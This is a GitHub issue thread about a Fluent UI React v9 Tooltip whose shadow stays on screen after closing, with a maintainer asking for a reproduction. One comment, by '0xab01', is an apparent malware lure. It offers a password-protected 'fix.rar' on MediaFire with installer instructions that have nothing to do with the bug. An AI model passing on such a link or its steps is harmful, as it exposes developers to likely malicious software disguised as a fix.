### ISSUE TITLE
[Bug]: Tooltip: Persistent Tooltip Shadow After Closure

### ISSUE THREAD

**Issue by stabildev** [microsoft/fluentui#32387]
### Library

React Components / v9 (@fluentui/react-components)

### System Info

```shell
System:
    OS: macOS 14.6.1
    CPU: (12) x64 Intel(R) Core(TM) i7-9750H CPU @ 2.60GHz
    Memory: 68.69 MB / 16.00 GB
    Shell: 5.9 - /bin/zsh
  Browsers:
    Chrome: 128.0.6613.84
    Edge: 127.0.2651.98
    Safari: 17.6
```

### Are you reporting an Accessibility issue?

None

### Reproduction

-

## Actual Behavior
The tooltip content disappears correctly, but the shadow of the tooltip remains visible after the tooltip has closed.

## Expected Behavior
When the tooltip closes, both its content and shadow should disappear completely, leaving no visual trace on the screen.

### Requested priority

Normal

### Are you willing to submit a PR to fix?

no

### Validations

- [X] Check that there isn't already an issue that reports the same bug to avoid creating a duplicate.
- [X] The provided reproduction is a minimal reproducible example of the bug.

**Comment by 0xab01** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Hotell** [comment]
@stabildev please provide valid reproduction link so we can test, otherwise we are not able to verify reported issue and we will close it. ty 

<img width="175" alt="image" src="https://github.com/user-attachments/assets/24b1a729-367a-446b-9c0f-4ee8a01c53ea">
